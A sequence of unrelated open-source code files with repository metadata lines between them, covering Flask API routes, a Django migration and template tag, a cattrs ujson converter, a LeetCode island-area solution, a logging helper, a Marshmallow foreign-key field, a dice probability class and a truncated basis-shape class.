'post',
profile_views.user_choose_mailing_lists,
json_renderer,
),
Rule(
'/subscriptions/',
'get',
notification_views.get_subscriptions,
json_renderer,
),
Rule(
[
'/project/<pid>/subscriptions/',
'/project/<pid>/node/<nid>/subscriptions/'
],
'get',
notification_views.get_node_subscriptions,
json_renderer,
),
Rule(
[
'/project/<pid>/tree/',
'/project/<pid>/node/<nid>/tree/'
],
'get',
project_views.node.get_node_tree,
json_renderer,
),
Rule(
'/subscriptions/',
'post',
notification_views.configure_subscription,
json_renderer,
),
Rule(
[
'/project/<pid>/settings/addons/',
'/project/<pid>/node/<nid>/settings/addons/',
],
'post',
project_views.node.node_choose_addons,
json_renderer,
),
Rule(
[
'/project/<pid>/settings/comments/',
'/project/<pid>/node/<nid>/settings/comments/',
],
'post',
project_views.node.configure_comments,
json_renderer,
),
# Invite Users
Rule(
[
'/project/<pid>/invite_contributor/',
'/project/<pid>/node/<nid>/invite_contributor/'
],
'post',
project_views.contributor.invite_contributor_post,
json_renderer
)
], prefix='/api/v1')
# Set up static routing for addons
# NOTE: We use nginx to serve static addon assets in production
addon_base_path = os.path.abspath('website/addons')
if settings.DEV_MODE:
@app.route('/static/addons/<addon>/<path:filename>')
def addon_static(addon, filename):
addon_path = os.path.join(addon_base_path, addon, 'static')
return send_from_directory(addon_path, filename)
| apache-2.0 | -6,358,533,792,708,472,000 | 30.363971 | 139 | 0.503575 | false |
mistakes-consortium/igng | images/migrations/0003_auto_20141207_1907.py | 1 | 1867 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('images', '0002_auto_20141201_0515'),
]
operations = [
migrations.CreateModel(
name='EXIFEntry',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
],
options={
},
bases=(models.Model,),
),
migrations.CreateModel(
name='ExifKey',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('key', models.CharField(max_length=64)),
],
options={
},
bases=(models.Model,),
),
migrations.CreateModel(
name='ExifValue',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('value', models.CharField(max_length=64)),
],
options={
},
bases=(models.Model,),
),
migrations.AddField(
model_name='exifentry',
name='key',
field=models.ForeignKey(to='images.ExifKey'),
preserve_default=True,
),
migrations.AddField(
model_name='exifentry',
name='value',
field=models.ForeignKey(to='images.ExifValue'),
preserve_default=True,
),
migrations.AddField(
model_name='image',
name='exif_data',
field=models.ManyToManyField(to='images.EXIFEntry', null=True, blank=True),
preserve_default=True,
),
]
| bsd-3-clause | 8,179,612,341,216,877,000 | 29.606557 | 114 | 0.50616 | false |
jonashagstedt/django-jsx | django_jsx/templatetags/djangojs.py | 1 | 1185 | from django import template
from django.conf import settings
from django_jsx.template.backend import JsTemplate
from django_jsx.template.loaders import JsLoader
register = template.Library()
loader = JsLoader(engine=None)
class JsMissingTemplateDirException(Exception):
pass
def _get_template_dirs():
for t in settings.TEMPLATES:
if t['BACKEND'] == 'django_jsx.template.backend.JsTemplates':
return t['DIRS']
return None
def _get_template_path(template_name):
template_dirs = _get_template_dirs()
if not template_dirs:
return None
template_path, _ = loader.load_template(template_name, template_dirs=template_dirs)
return template_path
@register.simple_tag(takes_context=True)
def include_js(context, template_name, **kwargs):
request = context.get('request')
template_path = _get_template_path(template_name)
if not template_path:
raise JsMissingTemplateDirException('No template directory')
template = JsTemplate(template_path)
template_context = context.flatten()
template_context.update(kwargs)
context.update(kwargs)
return template.render(template_context, request=request)
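# Usage sketch (illustrative, not part of the original module). Assuming the
# tag library is loaded under its module name and that a JSX template named
# "components/button.jsx" exists in one of the configured JsTemplates DIRS,
# the tag could be used from a Django template like this:
#
#     {% load djangojs %}
#     {% include_js "components/button.jsx" label="Save" %}
#
# Extra keyword arguments are merged into the rendering context, as seen in
# include_js() above.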
| bsd-3-clause | -1,721,959,321,510,596,600 | 29.384615 | 87 | 0.729114 | false |
Tinche/cattrs | src/cattr/preconf/ujson.py | 1 | 1075 | """Preconfigured converters for ujson."""
from base64 import b85decode, b85encode
from datetime import datetime
from .._compat import Set
from ..converters import Converter, GenConverter
def configure_converter(converter: Converter):
"""
Configure the converter for use with the ujson library.
    * bytes are serialized as base85 strings
* datetimes are serialized as ISO 8601
* sets are serialized as lists
"""
converter.register_unstructure_hook(
bytes, lambda v: (b85encode(v) if v else b"").decode("utf8")
)
converter.register_structure_hook(bytes, lambda v, _: b85decode(v))
converter.register_unstructure_hook(datetime, lambda v: v.isoformat())
converter.register_structure_hook(
datetime, lambda v, _: datetime.fromisoformat(v)
)
def make_converter(*args, **kwargs) -> GenConverter:
kwargs["unstruct_collection_overrides"] = {
**kwargs.get("unstruct_collection_overrides", {}),
Set: list,
}
res = GenConverter(*args, **kwargs)
configure_converter(res)
return res
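# Usage sketch (illustrative, not part of the original module): pairing the
# preconfigured converter with ujson itself. `Event` is a hypothetical attrs
# class standing in for whatever type you actually (un)structure.
#
#     import ujson
#
#     converter = make_converter()
#     payload = ujson.dumps(converter.unstructure(event))
#     restored = converter.structure(ujson.loads(payload), Event)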
| mit | -6,053,782,135,831,855,000 | 28.861111 | 74 | 0.689302 | false |
bowen0701/algorithms_data_structures | lc0695_max_area_of_island.py | 1 | 4625 | """Leetcode 695. Max Area of Island
Medium
URL: https://leetcode.com/problems/max-area-of-island/
Given a non-empty 2D array grid of 0's and 1's, an island is a group of 1's
(representing land) connected 4-directionally (horizontal or vertical.)
You may assume all four edges of the grid are surrounded by water.
Find the maximum area of an island in the given 2D array.
(If there is no island, the maximum area is 0.)
Example 1:
[[0,0,1,0,0,0,0,1,0,0,0,0,0],
[0,0,0,0,0,0,0,1,1,1,0,0,0],
[0,1,1,0,1,0,0,0,0,0,0,0,0],
[0,1,0,0,1,1,0,0,1,0,1,0,0],
[0,1,0,0,1,1,0,0,1,1,1,0,0],
[0,0,0,0,0,0,0,0,0,0,1,0,0],
[0,0,0,0,0,0,0,1,1,1,0,0,0],
[0,0,0,0,0,0,0,1,1,0,0,0,0]]
Given the above grid, return 6. Note the answer is not 11,
because the island must be connected 4-directionally.
Example 2:
[[0,0,0,0,0,0,0,0]]
Given the above grid, return 0.
Note: The length of each dimension in the given grid does not exceed 50.
"""
class SolutionDFSRecurUpdate(object):
def _dfs(self, r, c, grid):
# Check exit conditions: out of boundaries, in water.
if (r < 0 or r >= len(grid) or c < 0 or c >= len(grid[0]) or
grid[r][c] == 0):
return 0
# Mark (r, c) as visited.
grid[r][c] = 0
area = 1
# Visit 4 directions to accumulate area.
dirs = [(r - 1, c), (r + 1, c), (r, c - 1), (r, c + 1)]
for r_next, c_next in dirs:
area += self._dfs(r_next, c_next, grid)
return area
def maxAreaOfIsland(self, grid):
"""
:type grid: List[List[int]]
:rtype: int
Time complexity: O(m*n).
Space complexity: O(m*n).
"""
if not grid or not grid[0]:
return 0
max_area = 0
for r in range(len(grid)):
for c in range(len(grid[0])):
if grid[r][c] == 1:
area = self._dfs(r, c, grid)
max_area = max(max_area, area)
return max_area
class SolutionDFSIterUpdate(object):
def _get_tovisit_ls(self, v_start, grid):
r, c = v_start
tovisit_ls = []
# Visit up, down, left and right.
dirs = [(r - 1, c), (r + 1, c), (r, c - 1), (r, c + 1)]
for r_next, c_next in dirs:
if (0 <= r_next < len(grid) and
0 <= c_next < len(grid[0]) and
grid[r_next][c_next] == 1):
tovisit_ls.append((r_next, c_next))
return tovisit_ls
def _dfs(self, r, c, grid):
grid[r][c] = 0
# Use stack for DFS.
stack = [(r, c)]
area = 1
while stack:
# Get to-visit nodes from the top of stack.
tovisit_ls = self._get_tovisit_ls(stack[-1], grid)
if tovisit_ls:
for r_next, c_next in tovisit_ls:
grid[r_next][c_next] = 0
area += 1
stack.append((r_next, c_next))
# Break to continue DFS.
break
else:
stack.pop()
return area
def maxAreaOfIsland(self, grid):
"""
:type grid: List[List[int]]
:rtype: int
Time complexity: O(m*n).
Space complexity: O(m*n).
"""
if not grid or not grid[0]:
return 0
max_area = 0
for r in range(len(grid)):
for c in range(len(grid[0])):
if grid[r][c] == 1:
area = self._dfs(r, c, grid)
max_area = max(max_area, area)
return max_area
def main():
# Output: 6
grid = [[0,0,1,0,0,0,0,1,0,0,0,0,0],
[0,0,0,0,0,0,0,1,1,1,0,0,0],
[0,1,1,0,1,0,0,0,0,0,0,0,0],
[0,1,0,0,1,1,0,0,1,0,1,0,0],
[0,1,0,0,1,1,0,0,1,1,1,0,0],
[0,0,0,0,0,0,0,0,0,0,1,0,0],
[0,0,0,0,0,0,0,1,1,1,0,0,0],
[0,0,0,0,0,0,0,1,1,0,0,0,0]]
print SolutionDFSRecurUpdate().maxAreaOfIsland(grid)
grid = [[0,0,1,0,0,0,0,1,0,0,0,0,0],
[0,0,0,0,0,0,0,1,1,1,0,0,0],
[0,1,1,0,1,0,0,0,0,0,0,0,0],
[0,1,0,0,1,1,0,0,1,0,1,0,0],
[0,1,0,0,1,1,0,0,1,1,1,0,0],
[0,0,0,0,0,0,0,0,0,0,1,0,0],
[0,0,0,0,0,0,0,1,1,1,0,0,0],
[0,0,0,0,0,0,0,1,1,0,0,0,0]]
print SolutionDFSIterUpdate().maxAreaOfIsland(grid)
# Output: 0.
grid = [[0,0,0,0,0,0,0,0]]
print SolutionDFSRecurUpdate().maxAreaOfIsland(grid)
grid = [[0,0,0,0,0,0,0,0]]
print SolutionDFSIterUpdate().maxAreaOfIsland(grid)
if __name__ == '__main__':
main()
| bsd-2-clause | -5,161,163,467,805,236,000 | 27.20122 | 75 | 0.48627 | false |
MaxTyutyunnikov/lino | lino/core/kernel.py | 1 | 12433 | # -*- coding: UTF-8 -*-
## Copyright 2009-2013 Luc Saffre
## This file is part of the Lino project.
## Lino is free software; you can redistribute it and/or modify
## it under the terms of the GNU General Public License as published by
## the Free Software Foundation; either version 3 of the License, or
## (at your option) any later version.
## Lino is distributed in the hope that it will be useful,
## but WITHOUT ANY WARRANTY; without even the implied warranty of
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
## GNU General Public License for more details.
## You should have received a copy of the GNU General Public License
## along with Lino; if not, see <http://www.gnu.org/licenses/>.
from __future__ import unicode_literals
import logging
logger = logging.getLogger(__name__)
import os
import sys
#~ import imp
import codecs
import atexit
#~ import collections
from UserDict import IterableUserDict
from django.db.models import loading
from django.conf import settings
from django.utils.importlib import import_module
from django.utils.functional import LazyObject
from django.db import models
#from django.shortcuts import render_to_response
#from django.contrib.auth.models import User
from django.contrib.contenttypes import generic
from django.core.urlresolvers import reverse
from django.shortcuts import render_to_response, get_object_or_404
from django.contrib.sites.models import Site, RequestSite
from django.http import HttpResponse,HttpResponseRedirect, Http404
from django.template import RequestContext, Context, loader
from django.utils.http import urlquote, base36_to_int
from django.utils.translation import ugettext as _
from django.utils.safestring import mark_safe
import lino
from lino import dd
#~ from lino.core import signals
#~ from lino.core import actions
from lino.core import fields
from lino.core import layouts
from lino.core import actors
from lino.core import actions
from lino.core import dbtables
from lino.utils import class_dict_items
#~ from lino.utils.config import load_config_files, find_config_file
#~ from lino.utils import choosers
#~ from lino.utils import codetime
from lino.utils import curry
#~ from lino.models import get_site_config
#~ from north import babel
from lino.utils import AttrDict
#~ from lino.core import perms
#~ BLANK_STATE = ''
#~ DONE = False
#~ self.GFK_LIST = []
def set_default_verbose_name(f):
"""
If the verbose_name of a ForeignKey was not set by user code,
Django sets it to ``field.name.replace('_', ' ')``.
We replace this default value by ``f.rel.to._meta.verbose_name``.
This rule holds also for virtual FK fields.
"""
if f.verbose_name == f.name.replace('_', ' '):
f.verbose_name = f.rel.to._meta.verbose_name
#~ def shutdown_site(self):
#~ models_list = models.get_models(include_auto_created=True)
#~ for m in models_list:
#~ ...
def startup_site(self):
"""
This is the code that runs when you call :meth:`lino.site.Site.startup`.
This is a part of a Lino site setup.
    The Django Model definitions are done; now Lino analyzes them and performs certain actions.
- Verify that there are no more pending injects
- Install a DisableDeleteHandler for each Model into `_lino_ddh`
- Install :class:`lino.dd.Model` attributes and methods into Models that
don't inherit from it.
"""
if len(sys.argv) == 0:
process_name = 'WSGI'
else:
process_name = ' '.join(sys.argv)
#~ logger.info("Started %s on %r (PID %s).", process_name,self.title,os.getpid())
logger.info("Started %s (using %s) --> PID %s",
process_name,settings.SETTINGS_MODULE,os.getpid())
logger.info(self.welcome_text())
def goodbye():
logger.info("Done %s (PID %s)",process_name,os.getpid())
atexit.register(goodbye)
#~ analyze_models(self)
#~ print 20130219, __file__, "setup_choicelists 1"
#~ logger.info("Analyzing models...")
#~ self = settings.SITE
#~ logger.info(self.welcome_text())
#~ """
#~ Activate the site's default language
#~ """
#~ dd.set_language(None)
#~ logger.info(lino.welcome_text())
#~ raise Exception("20111229")
models_list = models.get_models(include_auto_created=True)
# this also triggers django.db.models.loading.cache._populate()
if self.user_model:
self.user_model = dd.resolve_model(self.user_model,
strict="Unresolved model '%s' in user_model.")
#~ if self.person_model:
#~ self.person_model = dd.resolve_model(self.person_model,strict="Unresolved model '%s' in person_model.")
#~ print 20130219, __file__, "setup_choicelists 2"
if self.project_model:
self.project_model = dd.resolve_model(self.project_model,
strict="Unresolved model '%s' in project_model.")
#~ print 20130219, __file__, "setup_choicelists 3"
for m in self.override_modlib_models:
dd.resolve_model(m,
strict="Unresolved model '%s' in override_modlib_models.")
for model in models_list:
#~ print 20130216, model
#~ fix_field_cache(model)
model._lino_ddh = DisableDeleteHandler(model)
for k in dd.Model.LINO_MODEL_ATTRIBS:
if not hasattr(model,k):
#~ setattr(model,k,getattr(dd.Model,k))
setattr(model,k,dd.Model.__dict__[k])
#~ model.__dict__[k] = getattr(dd.Model,k)
#~ logger.info("20121127 Install default %s for %s",k,model)
if isinstance(model.hidden_columns,basestring):
model.hidden_columns = frozenset(dd.fields_list(model,model.hidden_columns))
if model._meta.abstract:
raise Exception("Tiens?")
self.modules.define(model._meta.app_label,model.__name__,model)
for f in model._meta.virtual_fields:
if isinstance(f,generic.GenericForeignKey):
settings.SITE.GFK_LIST.append(f)
for a in models.get_apps():
#~ for app_label,a in loading.cache.app_store.items():
app_label = a.__name__.split('.')[-2]
#~ logger.info("Installing %s = %s" ,app_label,a)
for k,v in a.__dict__.items():
if isinstance(v,type) and issubclass(v,layouts.BaseLayout):
#~ print "%s.%s = %r" % (app_label,k,v)
self.modules.define(app_label,k,v)
#~ if isinstance(v,type) and issubclass(v,dd.Plugin):
#~ self.plugins.append(v)
#~ if isinstance(v,type) and issubclass(v,dd.Module):
#~ logger.info("20120128 Found module %s",v)
if k.startswith('setup_'):
self.modules.define(app_label,k,v)
self.setup_choicelists()
self.setup_workflows()
for model in models_list:
for f, m in model._meta.get_fields_with_model():
#~ if isinstance(f,models.CharField) and f.null:
if f.__class__ is models.CharField and f.null:
msg = "Nullable CharField %s in %s" % (f.name,model)
raise Exception(msg)
#~ if f.__class__ is models.CharField:
#~ raise Exception(msg)
#~ else:
#~ logger.info(msg)
elif isinstance(f,models.ForeignKey):
#~ f.rel.to = dd.resolve_model(f.rel.to,strict=True)
if isinstance(f.rel.to,basestring):
raise Exception("%s %s relates to %r (models are %s)" % (model,f.name,f.rel.to,models_list))
set_default_verbose_name(f)
"""
If JobProvider is an MTI child of Company,
then mti.delete_child(JobProvider) must not fail on a
            JobProvider being referred to only by objects that can refer
to a Company as well.
"""
if hasattr(f.rel.to,'_lino_ddh'):
#~ f.rel.to._lino_ddh.add_fk(model,f) # 20120728
f.rel.to._lino_ddh.add_fk(m or model,f)
dd.pre_analyze.send(self,models_list=models_list)
# MergeActions are defined in pre_analyze.
# And MergeAction needs the info in _lino_ddh to correctly find keep_volatiles
for model in models_list:
"""
Virtual fields declared on the model must have
been attached before calling Model.site_setup(),
e.g. because pcsw.Person.site_setup()
declares `is_client` as imported field.
"""
model.on_analyze(self)
for k,v in class_dict_items(model):
if isinstance(v,dd.VirtualField):
v.attach_to_model(model,k)
#~ logger.info("20130817 attached model vfs")
actors.discover()
actors.initialize()
dbtables.discover()
#~ choosers.discover()
actions.discover_choosers()
#~ from lino.core import ui
#~ ui.site_setup(self)
for a in actors.actors_list:
a.on_analyze(self)
#~ logger.info("20130121 GFK_LIST is %s",['%s.%s'%(full_model_name(f.model),f.name) for f in settings.SITE.GFK_LIST])
dd.post_analyze.send(self,models_list=models_list)
logger.info("Languages: %s. %d apps, %d models, %s actors.",
', '.join([li.django_code for li in self.languages]),
len(self.modules),
len(models_list),
len(actors.actors_list))
#~ logger.info(settings.INSTALLED_APPS)
self.on_each_app('site_setup')
"""
Actor.after_site_setup() is called after the apps' site_setup().
Example: pcsw.site_setup() adds a detail to properties.Properties,
the base class for properties.PropsByGroup.
The latter would not
install a `detail_action` during her after_site_setup()
and also would never get it later.
"""
for a in actors.actors_list:
a.after_site_setup(self)
#~ self.on_site_startup()
self.resolve_virtual_fields()
#~ logger.info("20130827 startup_site done")
class DisableDeleteHandler():
"""
Used to find out whether a known object can be deleted or not.
    Lino's default behaviour is to forbid deletion if there is any other
    object in the database that refers to this one. To implement this,
    Lino installs a DisableDeleteHandler instance on each model
    during :func:`analyze_models`, in an attribute `_lino_ddh`.
"""
def __init__(self,model):
self.model = model
self.fklist = []
def add_fk(self,model,fk):
self.fklist.append((model,fk))
def __str__(self):
return ','.join([m.__name__+'.'+fk.name for m,fk in self.fklist])
def disable_delete_on_object(self,obj):
#~ print 20101104, "called %s.disable_delete(%s)" % (obj,self)
#~ h = getattr(self.model,'disable_delete',None)
#~ if h is not None:
#~ msg = h(obj,ar)
#~ if msg is not None:
#~ return msg
for m,fk in self.fklist:
#~ kw = {}
#~ kw[fk.name] = obj
#~ if not getattr(m,'allow_cascaded_delete',False):
if not fk.name in m.allow_cascaded_delete:
n = m.objects.filter(**{fk.name : obj}).count()
if n:
msg = _("Cannot delete %(self)s because %(count)d %(refs)s refer to it.") % dict(
self=obj,count=n,
refs=m._meta.verbose_name_plural or m._meta.verbose_name+'s')
#~ print msg
return msg
return None
def unused_generate_dummy_messages(self):
fn = os.path.join(self.source_dir,'dummy_messages.py')
self.dummy_messages
raise Exception("use write_message_file() instead!")
| gpl-3.0 | 7,710,695,352,416,538,000 | 34.567647 | 121 | 0.588193 | false |
croscon/fleaker | fleaker/marshmallow/fields/foreign_key.py | 1 | 2218 | # ~*~ coding: utf-8 ~*~
"""Module that defines a Marshmallow field for Peewee's foreign keys."""
from marshmallow import fields
from .mixin import FleakerFieldMixin
class ForeignKeyField(fields.Integer, FleakerFieldMixin):
"""Marshmallow field that can be used with Peewee's foreign key setup.
Turns a field named ``${relation_name}_id`` into ``${relation_name}`` on
load, and then back to ``${relation_name}_id`` on dump again.
This fixes a discrepancy between PeeWee and common API usage. Common API
usage for DB ID's is to name them ``${relation_name}_id``, for clarity.
However, PeeWee only accepts FK values set through ``${relation_name}``, so
fix it!
    This field is affected by the following schema context variable:
    - ``'convert_fks'``: This will prevent the field from being renamed when
        serialized. This is useful if you will be double deserializing the data
        and you don't want it converted after the first pass. This flow is
        present for Webargs. By default, this field will rename the key when
        deserialized.
"""
def _jsonschema_type_mapping(self):
"""Define the JSON Schema type for this field."""
return {
'type': 'number',
'format': 'integer',
}
def _add_to_schema(self, field_name, schema):
"""Set the ``attribute`` attr to the field in question so this always
        gets deserialized into the field name without ``_id``.
Args:
field_name (str): The name of the field (the attribute name being
set in the schema).
schema (marshmallow.Schema): The actual parent schema this field
belongs to.
"""
super(ForeignKeyField, self)._add_to_schema(field_name, schema)
if self.get_field_value('convert_fks', default=True):
self.attribute = field_name.replace('_id', '')
def _serialize(self, value, attr, obj):
"""Grab the ID value off the Peewee model so we serialize an ID back.
"""
# this might be an optional field
if value:
value = value.id
return super(ForeignKeyField, self)._serialize(value, attr, obj)
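# Usage sketch (illustrative, not part of the original module; assumes a
# hypothetical `UserSchema` and marshmallow-2-style behaviour as described in
# the docstring above): declaring the field as ``company_id`` keeps the API
# key ``company_id`` while deserializing into ``company`` for Peewee.
#
#     class UserSchema(Schema):
#         company_id = ForeignKeyField()
#
#     UserSchema().load({'company_id': 42})   # -> data {'company': 42}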
| bsd-3-clause | -3,171,669,109,654,031,000 | 37.241379 | 79 | 0.638413 | false |
btbonval/DieStatistician | XdY.py | 1 | 5433 | '''
Bryan Bonvallet
2009
XdY is standard nomenclature for taking X dice with Y faces,
rolling them all, and adding the result. 'd' represents dice.
The class XdY is defined to create a probability mass function
for the result of rolling and adding X dice with Y faces.
'''
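# Illustrative note (not part of the original file): in this notation "3d6"
# means rolling three six-sided dice and summing them, so XdY((3, 6)) builds
# the probability mass function over the values 3 through 18.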
from PMF import *
class XdY(PMF,FiniteSequence):
''' Represents a discrete probability mass function
of adding up X dice with Y faces.
Allows direct sampling from the distribution, calculation of
statistics, and some more advanced probability distribution
arithmetic. '''
def __init__(self, description, error=None):
''' Instantiate a discrete PMF. Description is either [X, Y] or a
distribution.
X and Y are integers. X represents the number of dice, and Y
represents the number of faces on each die. '''
if error is not None:
self.error = error
self.description = description
self.setDistribution()
def setDistribution(self):
''' Updates the internal distribution using the internal error and
internal description. '''
description = self.description
try:
# Assume [X, Y] is provided:
if numpy.matrix(description).size == 2:
distribution = self.genDistribution(description[0],description[1])
else:
distribution = description
except:
# [X, Y] is not provided. Assume it is a distribution.
distribution = description
if not self.validateDistribution(distribution):
raise TypeError('Invalid distribution: %s. Input: %s' %(self.validationError, distribution))
self.distribution = self.castToDistribution(distribution)
def genDistribution(self, X, Y):
''' Generate the distribution for XdY using PMF intermediates. '''
# Must generate the base function of 1dY with uniform distribution.
values = range(1,Y+1)
probs = numpy.ones(Y) * 1.0/Y
basepmf = self.__class__([values,probs],self.error)
# Add the dice distributions together X times.
pmf = basepmf
for i in range(1,X):
pmf = pmf + basepmf
return pmf
def setError(self, error):
''' Sets the internal maximal error value as a singleton
real number specified by the argument error.
Then recalculates the distribution. '''
self.error = error
self.setDistribution()
def __radd__(self, other):
''' Reverse add acts just as normal add, but implies other
does not support adding. '''
return self + other
def __add__(self, other):
''' The probability distribution of the addition of two
independent random variables is the convolution of the
probability distribution functions of the random variables. '''
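    # Worked example (illustrative, not from the original file): adding two
    # fair coins valued 1 or 2, i.e. 1d2 + 1d2. Convolving the probability
    # vectors [0.5, 0.5] and [0.5, 0.5] yields [0.25, 0.5, 0.25], attached to
    # the values 2, 3 and 4; this is exactly what the code below computes.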
# First, make sure other can be compared properly.
if not self.validateDistribution(other):
raise TypeError('Invalid distribution for addition: %s' %(self.validationError))
# Find appropriate error value. Choose maximum if possible.
try:
if self.error > other.error:
error = self.error
else:
error = other.error
except:
error = self.error
# "cast" into a friendly format.
other = self.__class__(other,error)
# Setup values and probabilities to Convolve the PMFs.
inputAvalue = self.getDistribution(0)
inputBvalue = other.getDistribution(0)
inputAprob = self.getDistribution(1)
inputBprob = other.getDistribution(1)
leftside = numpy.min(inputBvalue) - numpy.min(inputAvalue)
if leftside > 0:
# B begins further "right" than A. Leftpad B with zeros.
inputBprob = numpy.concatenate((numpy.zeros(leftside),inputBprob),1)
if leftside < 0:
# B begins further "left" than A. Leftpad A with zeros.
inputAprob = numpy.concatenate((numpy.zeros(-1*leftside),inputAprob),1)
# Convolve the distributions.
outputprob = numpy.convolve(inputAprob, inputBprob)
# Either A or B may be left padded. The number of zeros padded
# to the input of convolution will be the number of zeros padded
# to the output. Skip the padding, but keep the rest.
outputprob = outputprob[numpy.abs(leftside):]
# Find the values for the associated convolution.
minoutputvalue = numpy.min(inputAvalue) + numpy.min(inputBvalue)
maxoutputvalue = minoutputvalue + len(self) + len(other) - 2
outputvalue = range(int(minoutputvalue),int(maxoutputvalue)+1)
return self.__class__(numpy.array([outputvalue, outputprob]),error)
# Some example code
if __name__ == "__main__":
print "Take one six-sided die and roll it. The distribution would be: "
six1 = XdY( (1,6) )
print str(six1)
print "Add two six-sided dice together: "
six2a = six1 + six1
print str(six2a)
print "Also add two six-sided dice together: "
six2b = XdY( (2,6) )
print str(six2b)
print "If heads is one and tails is two, sum of three coin flips: "
coin3 = XdY( (3,2) )
print str(coin3)
print "Three coin flips plus two six sided dice: "
mix = six2b + coin3
print str(mix)
print "Expected value from the above distribution: "
print mix.EV()
print "Take three samples from the above distribution: "
for i in range(0,3):
print mix.getSample()
| mit | 8,488,510,294,593,417,000 | 34.279221 | 103 | 0.652678 | false |
nsgomez/FBGroupCommentCounter | prettyprint.py | 1 | 1091 | colorAvailable = False
loglevel_colors = None
verbose = False
try:
import colorama
from colorama import Fore
colorama.init()
loglevel_colors = [Fore.RED, Fore.YELLOW, Fore.BLUE, Fore.MAGENTA]
colorAvailable = True
except:
pass
loglevel_sz = ["[!!]", "[??]", "[ii]", "[vv]"]
class Logging:
ERROR = 0
WARNING = 1
MESSAGE = 2
VERBOSE = 3
def getTracePrefix(loglevel = Logging.MESSAGE):
sz = ""
if colorAvailable:
sz += loglevel_colors[loglevel]
sz += loglevel_sz[loglevel]
if colorAvailable:
sz += Fore.RESET
sz += " "
return sz
def enableVerbosity():
global verbose
verbose = True
trace("Verbosity enabled")
# pprint a.k.a. prettyprint
def pprint(sz, loglevel = Logging.MESSAGE):
if loglevel is Logging.VERBOSE and verbose == False:
return
print(getTracePrefix(loglevel) + sz)
def trace(sz):
pprint(sz, Logging.VERBOSE)
def perror(sz):
pprint(sz, Logging.ERROR)
def pwarn(sz):
pprint(sz, Logging.WARNING)
def pinfo(sz):
pprint(sz, Logging.MESSAGE)
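# Usage sketch (illustrative, not part of the original file):
#
#     enableVerbosity()          # allow trace() messages through
#     trace("loading config")    # "[vv]" prefix, magenta when colorama works
#     perror("disk full")        # "[!!]" prefix, red when colorama works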
| mit | -8,068,261,839,044,515,000 | 16.046875 | 70 | 0.633364 | false |
WaveBlocks/WaveBlocksND | WaveBlocksND/HyperCubicShape.py | 1 | 9987 | """The WaveBlocks Project
This file contains the class for representing the hypercubic basis shape
which is the full dense basis set.
@author: R. Bourquin
@copyright: Copyright (C) 2012, 2013, 2014, 2015 R. Bourquin
@license: Modified BSD License
"""
from numpy import array, eye, vstack, integer
from WaveBlocksND.BasisShape import BasisShape
__all__ = ["HyperCubicShape"]
class HyperCubicShape(BasisShape):
r"""This class implements the hypercubic basis shape
which is the full dense basis set.
A basis shape is essentially all information and operations
related to the set :math:`\mathfrak{K}` of multi-indices :math:`k`.
The hypercubic shape in :math:`D` dimensions and with limit :math:`K_d`
in dimension :math:`d` is defined as the set
.. math::
\mathfrak{K}(D, K) := \{ (k_0, \ldots, k_{D-1}) \in \mathbb{N}_0^D |
k_d < K_d \forall d \in [0,\ldots,D-1] \}
"""
def __init__(self, limits):
r"""
:param limits: The list of all limits :math:`\{K_d\}_{d=0}^{D-1}`
"""
# The dimension of K
self._dimension = len(limits)
# The limits Ki for each axis
limits = tuple(limits)
if all([int(l) > 0 for l in limits]):
self._limits = limits
else:
raise ValueError("All limits have to be positive.")
# TODO: Do we really want to store these maps or better compute data on the fly
# The linear mapping k -> index for the basis
iil = self._get_index_iterator_lex()
self._lima = {k: index for index, k in enumerate(iil)}
# And the inverse mapping
self._lima_inv = {v: k for k, v in self._lima.items()}
# The basis size
self._basissize = len(self._lima)
def __str__(self):
r""":return: A string describing the basis shape :math:`\mathfrak{K}`.
"""
s = ("Hypercubic basis shape of dimension "+str(self._dimension)+" and with limits "+str(self._limits)+".")
return s
def __hash__(self):
r"""Compute a unique hash for the basis shape. In the case of hypercubic
basis shapes :math:`\mathfrak{K}` the basis is fully specified by its
maximal index :math:`K_i` along each direction :math:`i \in [0,\ldots,D-1]`.
"""
return hash(("HyperCubicShape", self._limits))
def __getitem__(self, k):
r"""Make map look ups.
"""
if type(k) is tuple or type(k) is list:
k = tuple(k)
assert len(k) == self._dimension
if k in self._lima:
return self._lima[k]
elif type(k) is int:
if k in self._lima_inv:
return self._lima_inv[k]
else:
raise IndexError("Wrong index type")
def __contains__(self, k):
r"""
Checks if a given multi-index :math:`k` is part of the basis set :math:`\mathfrak{K}`.
:param k: The multi-index we want to test.
:type k: tuple
"""
assert len(tuple(k)) == self._dimension
return tuple(k) in self._lima
def __iter__(self):
r"""Implements iteration over the multi-indices :math:`k`
of the basis set :math:`\mathfrak{K}`.
Note: The order of iteration is NOT fixed. If you need a special
iteration scheme, use :py:meth:`get_node_iterator`.
"""
# TODO: Better remove this as it may cause unexpected behaviour?
return iter(self._lima)
def contains(self, k):
r"""
Checks if a given multi-index :math:`k` is part of the basis set :math:`\mathfrak{K}`.
:param k: The multi-index we want to test.
:type k: tuple
"""
return tuple(k) in self._lima
def get_description(self):
r"""Return a description of this basis shape object.
A description is a ``dict`` containing all key-value pairs
necessary to reconstruct the current basis shape. A description
never contains any data.
"""
d = {}
d["type"] = "HyperCubicShape"
d["limits"] = self._limits
return d
def extend(self):
r"""Extend the basis shape such that (at least) all neighbours of all
boundary nodes are included in the extended basis shape.
"""
extended_limits = [l + 1 for l in self._limits]
return HyperCubicShape(extended_limits)
def _get_index_iterator_lex(self):
r"""
"""
# Upper bounds in each dimension
bounds = self._limits[::-1]
def index_iterator_lex(bounds):
# Initialize a counter
z = [0 for i in range(self._dimension + 1)]
while z[self._dimension] == 0:
# Yield the current index vector
yield tuple(reversed(z[:-1]))
# Increment fastest varying bit
z[0] += 1
# Reset overflows
for d in range(self._dimension):
if z[d] >= bounds[d]:
z[d] = 0
z[d + 1] += 1
return index_iterator_lex(bounds)
def _get_index_iterator_chain(self, direction=0):
r"""
"""
def index_iterator_chain(d):
# Number of functions in each dimension
bounds = self._limits[:]
# The counter
z = [0 for i in range(self._dimension + 1)]
# Iterate over all valid stencil points
while not z[-1] > 0:
# Otherwise we would yield k = (0,...,0) for limits = [1,...,1]
if not z[d] > bounds[d] - 2:
yield tuple(z[:-1])
